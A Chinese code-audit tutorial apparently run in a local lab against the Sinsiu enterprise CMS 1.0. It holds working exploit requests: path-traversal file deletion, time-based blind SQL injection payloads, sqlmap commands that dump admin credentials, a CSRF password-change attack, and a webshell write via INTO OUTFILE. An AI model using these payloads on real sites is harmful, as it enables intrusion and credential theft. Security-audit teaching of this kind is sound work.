PHP代码审计之入门实战
系统介绍
CMS名称:新秀企业网站系统PHP版
官网: www.sinsiu.com
版本:这里国光用的 1.0 正式版 (官网最新的版本有毒,网站安装的时候居然默认使用远程数据库???迷之操作 那站长的后台密码岂不是直接泄露了?疑似远程数据库地址: server.sinsiu.net )
下载地址: 蓝奏云
Windows下使用PHPStudy可以直接安装,搭建起来还是很简单的。
防护策略
虽然这是一个不知名的小系统,但是安全加固还是考虑到的,很多本应该有漏洞的地方均被加固修复了,导致国光我一开始一直碰壁,=,= 废话不多说,下面直接列举本次审计碰到的一些坑。
伪造IP注入过滤
思路
首先在后台发现有记录用户IP的功能:
哦豁,会不会有传说中的伪造IP地址注入攻击呢???使用数据库监测工具,发现在注册用户发表评论的时候。用户的IP地址也的确被带入SQL语句中查询了:
select * from php_safe where saf_ip = '10.211.55.2' and saf_action = 'message'
VSCode走起,根据关键词来查找相关功能代码:
include/function.php
//获取客户端IP function get_ip() { if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'),'unknown')) { $ip = getenv('HTTP_CLIENT_IP'); }elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'),'unknown')){ $ip = getenv('HTTP_X_FORWARDED_FOR'); }elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'),'unknown')){ $ip = getenv('REMOTE_ADDR'); }elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],'unknown')){ $ip = $_SERVER['REMOTE_ADDR']; }else{ $ip = '0.0.0.0'; } if(!is_numeric(str_replace('.','',$ip))) { $ip = '0.0.0.0'; } return $ip; }
结果
获取IP的关键防护代码:
if(!is_numeric(str_replace('.','',$ip))) { $ip = '0.0.0.0'; }
获取到的IP值,去除掉 .
后如果不是 数字类型 的话就重置为 0.0.0.0
,扑街,这条思路行不通,赶紧换个思路去
存储型XSS过滤
思路
网站前台有留言功能,留言就会想到存储型XSS,2333 嗝:
结果
定位到留言函数的代码:
index/module/info_main.php
function add_message() { safe('message'); global $global,$smarty,$lang; $mes_email = post('email'); $mes_type = post('type'); $mes_title = post('title'); $mes_text = post('text'); $mes_show = post('show'); if($mes_email == '' || $mes_type == '' || $mes_title == '' || $mes_text == '') { $info_text = $lang['submit_error_info']; }else{ $mes_add_time = time(); if($mes_show != '2') { $mes_show = '0'; } $obj = new message(); $obj->set_value('mes_user_id',$global['user_id']); $obj->set_value('mes_type',$mes_type); $obj->set_value('mes_email',$mes_email); $obj->set_value('mes_title',$mes_title); $obj->set_value('mes_text',$mes_text); $obj->set_value('mes_add_time',$mes_add_time); $obj->set_value('mes_show',$mes_show); $obj->set_value('mes_lang',S_LANG); $obj->add(); if(intval(get_varia('sentmail'))) { $email_title = '您的网站有了新的留言'; $email_text = "[$mes_type] $mes_title
$mes_text"; call_send_email($email_title,$email_text,$global['user_id'],$mes_email); } $info_text = $lang['submit_message']; } $smarty->assign('info_text',$info_text); $smarty->assign('link_text',$lang['go_back']); $smarty->assign('link_href',url(array('channel'=>'message'))); }
可以看到前台用户传入的数据经过了 post()
函数,追踪到 post()
函数的定义处:
include/function.php
function post($val,$filter = 'strict') { return $filter(isset($_POST[$val])?$_POST[$val]:''); }
??? 继续找到 strict
的定义处:
include/function.php
//严格过滤字符串中的危险符号 function strict($str) { if(S_MAGIC_QUOTES_GPC) { $str = stripslashes($str); } $str = str_replace('',' ',$str); $str = str_replace('?',' ',$str); $str = str_replace('%',' ',$str); $str = str_replace(chr(39),' ',$str); $str = str_replace(chr(34),' ',$str); $str = str_replace(chr(13).chr(10),'
',$str); return $str; }
可以发现 我们的存储XSS所用到的尖括号完全被过滤掉了:
$str = str_replace('',' ',$str);
这也导致了 管理员后台可以直接看到XSS Payload ,场面一度非常尴尬:
用户评论的核心代码也被过滤了:
index/module/info_main.php
function add_comment() { safe('comment'); global $global,$smarty,$lang; $channel = post('channel'); $com_page_id = post('page_id'); $com_email = post('email'); $com_rank = post('rank'); $com_text = post('text'); if($channel == '' || $com_page_id == '' || $com_rank == '' || $com_email == '' || $com_text == '') { $info_text = $lang['submit_error_info']; } ... ... }
存储XSS 扑gai~
前台用户CSRF判断
思路
网站有留言板和文章评论,如何存在CSRF越权的话可以在评论或者留言处贴构造好的CSRF链接,来进行CSRF攻击。23333 感觉稳了!定位到相关功能代码:
index/module/user/deal.php
function edit_pwd() { safe('edit_pwd'); global $global,$smarty,$lang; $old_pwd = post('old_pwd'); $new_pwd = post('new_pwd'); $re_pwd = post('re_pwd'); if(strlen($old_pwd) 15 || strlen($new_pwd) 15 || $new_pwd != $re_pwd) { $info_text = $lang['submit_error_info']; }else{ $use_password = md5($old_pwd); $obj = new users(); $obj->set_where('use_id = '.$global['user_id']); $obj->set_where("use_password = '$use_password'"); if($obj->get_count() > 0) { $use_password = md5($new_pwd); $obj->set_value('use_password',$use_password); ... ... }
结果
index/moudle/user/deal.php
// 这里需要提供旧密码 $use_password = md5($old_pwd); $obj = new users(); $obj->set_where('use_id = '.$global['user_id']); $obj->set_where("use_password = '$use_password'"); if($obj->get_count() > 0)
没有旧密码 是不可能改密码的,所以CSRF攻击其他用户的想法GG
可控变量过滤
虽然作为一个CMS,用户可控变量很多,文章浏览等功能不可避免地要进行数据库操作,但是该系统基本上把所以可控变量都给过滤了。
session 过滤
使用了 $filter = 'strict'
严格模式,关于 strict
函数细节可以参考文章上面贴的代码:
include/function.php
function set_session($name,$value,$filter = 'strict') { if(S_SESSION) { $_SESSION[$name] = $filter($value); }else{ setcookie($name,$filter($value)); } } //获取session function get_session($name,$filter = 'strict') { if(S_SESSION) { return $filter(isset($_SESSION[$name])?$_SESSION[$name]:''); }else{ return $filter(isset($_COOKIE[$name])?$_COOKIE[$name]:''); } }
cookie过滤
include/function.php
//获取cookie function get_cookie($name,$filter = 'strict') { return $filter(isset($_COOKIE[$name])?$_COOKIE[$name]:''); }
管理员登录过滤
admin/module/info_main.php
function admin_login() { safe('admin_login'); global $smarty,$lang; $username = substr(post('username'),0,30); $password = substr(post('password'),0,30); if($username == '' || $password == '') { unset_session('admin_username'); unset_session('admin_password'); $info_text = '对不起,用户名和密码不能为空'; $link_text = '返回重新登录'; } ... ... }
普通用户登录过滤
index/module/info_main.php
function user_login() { safe('user_login'); global $global,$smarty,$lang; $info_text = post('info_text'); $link_text = post('link_text'); $link_href = post('link_href'); $username = post('username'); $password = post('password'); ... ... }
大致就这么多防护了,接下来开始真正地来进行漏洞挖掘。
漏洞分析
后台任意文件删除
漏洞分析
漏洞文件: admin/deal.php
deal.php
function del_file() { $path = post('path'); $flag = false; $dir[0] = 'data/backup/'; $dir[1] = 'images/'; $dir[2] = 'resource/'; for($i = 0; $i < count($dir); $i ++) { if(substr($path,0,strlen($dir[$i])) == $dir[$i]) { $flag = true; } } if($flag) { if(unlink($path)) { $result = 1; } } echo isset($result)?$result:0; }
这里核心看这处代码:
if(substr($path,0,strlen($dir[$i])) == $dir[$i]) { $flag = true; }
这是个删除文件的函数定义,删除文件用了白名单策略,必须只能删除:
$dir[0] = 'data/backup/'; $dir[1] = 'images/'; $dir[2] = 'resource/';
这3个目录下的文件,使用了 substr
从 $path
的0位置开始往后判断,只校验了 $path
前面是否在白名单内部,但是却忽略了 白名单 后面 的路径可能使用 ../
的这种形式来穿越目录。
漏洞利用
抓取 删除
这个操作的数据包,具体如下:
POST /admin.php?/deal/ HTTP/1.1 Host: 10.211.55.12 Content-Length: 33 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://10.211.55.12 Referer: http://10.211.55.12/admin.php?/file/mod-pic_lists/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 Cookie: PHPSESSID=7e2ofb2sbe5p0bhv8rcgfg5n84 Connection: close cmd=del_file&path=images/../1.php
通过在白名单目录后面使用 ../
可以实现跨目录任意文件删除,删除成功返回 1
后台盲注
后台盲注有好几处点,虽然可控变量基本上都被过滤了,但是却忽略 数字型盲注 不需要闭合单引号就可以直接拼接SQL语句导致盲注的产生,下面就找一个典型的例子来分析。
漏洞分析
删除管理员账号这里存在数字型盲注,下面来看下细节代码:
admin/module/basic/deal.php
function del_admin() { global $global; $adm_id = post('id'); $obj = new admin(); $obj->set_where('adm_id = '.$global['admin_id']); $a = $obj->get_one(); $obj->set_where(''); $obj->set_where("adm_id = $adm_id"); $b = $obj->get_one(); if($obj->get_count()) { if($a['adm_grade'] del(); set_cookie('result',1); } } echo 1; }
比较关键的两处代码是:
// admin_id 用户可控 虽然经过post过滤了 $adm_id = post('adm_id'); // post过滤后直接带入数据库操作 $obj->set_where('adm_id = '.$global['admin_id']);
为了进一步分析,使用Burpsuite来抓取修改密码的数据包,具体如下:
POST /admin.php?/deal/dir-basic/ HTTP/1.1 Host: 10.211.55.12 Content-Length: 18 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://10.211.55.12 Referer: http://10.211.55.12/admin.php?/basic/mod-admin_list/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 Cookie: PHPSESSID=7e2ofb2sbe5p0bhv8rcgfg5n84; user_username=111111; user_password=96e79218965eb72c92a549dd5a330112 Connection: close cmd=del_admin&id=2
因为代码里面只返回1 echo 1;
所以这里注入的话只能使用 数字型基于时间的盲注 了:
数据库监控工具来看一下后台执行了什么样的SQL语句:
select * from php_admin where adm_id = 3
先延时再验证一下:
cmd=del_admin&id=3 and sleep(10)
后台SQL语句:
select * from php_admin where adm_id = 3 and sleep(10)
然鹅测试发现并没有延时反应,因为这里是删除用户,当这个用户的ID被删掉以后,用and语句前提是两边都是真才可以,所以这里得把 and 换成 or 语句:
延时貌似误差比较大,实际延时的时长大概是理论延时的两倍左右。
既然知道有注入的话 ,下面开始验证吧。
漏洞利用
手工验证
手工延时盲注是个细心的活,下面只举个基本例子:
# 判断当前数据库长度 # 当前数据库长度是否为 1 没有延时 不是 cmd=del_admin&id=3 or if(length(database())=1,sleep(3),0) # 延时 表明当前数据库长度为 6 cmd=del_admin&id=3 or if(length(database())=6,sleep(3),0) # 当前数据库第1个字母的ascii码是否为 97 没有延时 不是 cmd=del_admin&id=3 or if(ascii(mid(database(),1,1))=97,sleep(3),0) # 延时 表明当前数据库第1个字母的ascii码为 115 即 's' cmd=del_admin&id=3 or if(ascii(mid(database(),1,1))=115,sleep(3),0) # 当前数据库第2个字母的ascii码是否为 97 没有延时 不是 cmd=del_admin&id=3 or if(ascii(mid(database(),2,1))=97,sleep(3),0) # 延时 表明当前数据库第2个字母的ascii码为 105 即 'i' cmd=del_admin&id=3 or if(ascii(mid(database(),2,1))=105,sleep(3),0) ...
SQLMap注入
为啥不自己写脚本来注入呢???因为SQLMap本身很强大,这里不需要造轮子,很多人不了解SQLMap,认为现在基本上SQLMap注入不出来啥,实际上还是他们不够了解,SQLMap灵活程度非常高,远比自己造轮子写脚本快的多。下面直接上关键的用法参数吧:
sqlmap -u "http://10.211.55.12//admin.php?/deal/dir-basic/" --cookie="PHPSESSID=7e2ofb2sbe5p0bhv8rcgfg5n84;" --data="cmd=del_admin&id=3" -p "id" --technique=T --random-agent -v 3 --tamper="between" -D 'sinsiu' -T 'php_admin' -C 'adm_id,adm_username,adm_password' --dump
注入结果
细节
-u "http://10.211.55.12//admin.php?/deal/dir-basic/"
实际上也可以 保存数据包为文本,然后 -r
,文本里面手动标 星号
--cookie="PHPSESSID=7e2ofb2sbe5p0bhv8rcgfg5n84;"
因为这个是后台盲注,所以这里需要Cookie认证一下
--data="cmd=del_admin&id=3"
手动写入POST数据包,将请求中提供对应发送的数据隐式地将 GET 改成 POST
-p "id"
手动指出存在注入的参数
--technique=T
手动指定 时间型盲注 的检测技术,SQLMap默认检测技术为 BEUSTQ
--random-agent
好习惯,随机user-agent
-v 3
国光自己的习惯,显示已注入的 payloads,国光习惯看SQLMap的payload,看多有助于学习先进的手工注入技术
--tamper="between"
因为这个网站过滤了尖括号,所以介个插件,作用是 NOT BETWEEN 0 AND #
替换大于号 >
, BETWEEN # AND #
替换等于号 =
-D 'sinsiu' -T 'php_admin' -C 'adm_id,adm_username,adm_password' --dump
日常操作,这里大家应该很熟悉了,国光就不再BB了
管理员CSRF
漏洞分析
修改管理员密码,没有验证就密码,直接提供新密码,而且没有Token验证来防御CSRF攻击:
admin/moudle/basic/deal.php
function edit_admin() { global $global,$smarty; $adm_id = post('adm_id'); $adm_password = post('adm_password'); $re_password = post('re_password'); $obj = new admin(); $obj->set_where('adm_id = '.$global['admin_id']); $a = $obj->get_one(); $obj->set_where(''); $obj->set_where("adm_id = $adm_id"); $b = $obj->get_one(); $success = 0; if($obj->get_count()) { if($a['adm_id'] == $b['adm_id'] || $a['adm_grade'] = 5 && $adm_password == $re_password) { $obj->set_value('adm_password',md5($adm_password)); $obj->edit(); $success = 1; } } } if($success) { $info_text = '修改密码成功'; $link_text = '返回列表页'; $link_href = url(array('channel'=>'basic','mod'=>'admin_list')); }else{ $info_text = '修改密码失败'; $link_text = '返回上一页'; $link_href = url(array('channel'=>'basic','mod'=>'admin_edit')); } $smarty->assign('info_text',$info_text); $smarty->assign('link_text',$link_text); $smarty->assign('link_href',$link_href); }
同理添加管理员也是这样:
admin/moudle/basic/deal.php
function add_admin() { global $global,$smarty; $adm_username = post('adm_username'); $adm_password = post('adm_password'); $re_password = post('re_password'); $obj = new admin(); $obj->set_where('adm_id = '.$global['admin_id']); $one = $obj->get_one(); $adm_grade = $one['adm_grade'] + 1; $obj->set_where(''); $obj->set_where("adm_username = '$adm_username'"); if($obj->get_count() == 0 && strlen($adm_username) >= 5 && strlen($adm_password) >= 5 && $adm_password == $re_password) { $obj->set_value('adm_username',$adm_username); $obj->set_value('adm_password',md5($adm_password)); $obj->set_value('adm_grade',$adm_grade); $obj->add(); $info_text = '添加管理员帐号成功'; $link_text = '返回列表页'; $link_href = url(array('channel'=>'basic','mod'=>'admin_list')); }else{ $info_text = '添加管理员帐号失败'; $link_text = '返回上一页'; $link_href = url(array('channel'=>'basic','mod'=>'admin_add')); } $smarty->assign('info_text',$info_text); $smarty->assign('link_text',$link_text); $smarty->assign('link_href',$link_href); }
漏洞利用
修改管理员密码为:Passw0rd 构造以下HTML页面:
history.pushState('', '', '/')document.forms[0].submit();
下面实际来模拟一下攻击场景
攻击者将上述html保存到外网上,引诱管理员点击,然后自动触发CSRF攻击:
管理员在后台 使用当前浏览器去访问这个地址的时候就中招了,这个html里面的修改密码表单会自动触发,GG
前台盲注
前面漏洞要么需要拿到后台,要么需要社工来CSRF攻击管理员,需要一些运气成分,但是这个洞就不需要了,这个洞产生点在网站的前台,可以直接进行注入。
漏洞分析
index/module/search_main.php
set_field('goo_id,goo_title,goo_x_img'); $obj->set_where("goo_title like '%" . $global['key'] . "%'"); $obj->set_where('goo_channel_id = '.get_id('channel','cha_code','goods')); $len = get_varia('img_list_len'); $obj->set_page_size($len ? $len : 12); $obj->set_page_num($global['page']); $sheet = $obj->get_sheet(); for($i = 0; $i get_page_sum()); $smarty->assign('search',$sheet); } //新秀 ?>
这里首先进行URL解码:
$global['key'] = rawurldecode($global['key']);
然后就直接带入数据库查询了:
$obj->set_where("goo_title like '%" . $global['key'] . "%'");
???不明白为啥这里大意了,明明其他地方过滤都很严格的…
漏洞利用
知道代码仅仅经过一次URL解码,所以尝试一下使用 %23
,解码后就是 #
来闭合后面的语句:
http://10.211.55.12/?/search/index.html/key-%27%20and%20sleep(2)%20%23/
%27and%20sleep(2)%20%23
URL解码为: ' and sleep(2) #
使用MySQL监控工具查看日志:
select goo_id,goo_title,goo_x_img from php_goods where goo_lang = 'zh-cn' and goo_show = 1 and goo_title like '%' and sleep(2) #%' and goo_channel_id = 1 order by goo_top desc,goo_index desc,goo_id desc
成功了,那么接下来使用SQLMap来进注入吧。
sqlmap -u "http://10.211.55.12/?/search/index.html/key-%27*%20%23/" -v 3 --technique=T -D 'sinsiu' -T 'php_admin' -C 'adm_id,adm_username,adm_password' --dump
因为这里 key-%27*%20%23
国光我使用 *
给SQLMap预留好了,然后SQLMap直接注入即可:
理论情况
这部分纯理论测试,实际情况下一般没写入权限,但是还是记录一下吧。如果有大佬可以审计出后台getshell的话 欢迎评论区留言 这样就可以一条龙攻击了~~~
MySQL新版下 secure-file-priv
字段用来限制MySQL对目录的操作权限。先查看一下本地我们的MySQL是否有作限制
mysql> show global variables like '%secure%'; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_auth | OFF | | secure_file_priv | NULL | +------------------+-------+ 2 rows in set (0.00 sec)
-
secure_file_priv的值为null ,表示限制mysqld 不允许导入导出
-
secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入导出只能发生在/tmp/目录下
-
secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
为了进行理论上漏洞测试,下面来修改一下MySQL配置文件,修改 mysql.ini 文件,在 [mysqld] 下加入:
secure_file_priv=
重启MySQL服务即可生效:
mysql> show global variables like '%secure%'; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_auth | OFF | | secure_file_priv | | +------------------+-------+ 2 rows in set (0.00 sec)
写shell需要网站爆物理路径才可以,当代码没有检测异常操作的时候,遇到错误会直接报错泄露物理路径,这个CMS信息泄露的地方有很多,下面随便找几处:
http://localhost/admin/admin.php http://localhost/admin/deal.php http://localhost/admin/info.php http://localhost/include/common.php http://localhost/index/info.php http://localhost/index/user.php ...
浏览器直接访问一个试试看:
获取到网站的物理路径为:
C:\phpStudy\PHPTutorial\WWW\
OK,那么可以直接开始写shell了:
http://10.211.55.12/?/search/index.html/key-%27union select 1,2,'' into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\gg.php'%20%23/
shell写入目录为网站根目录下,文件名为gg.php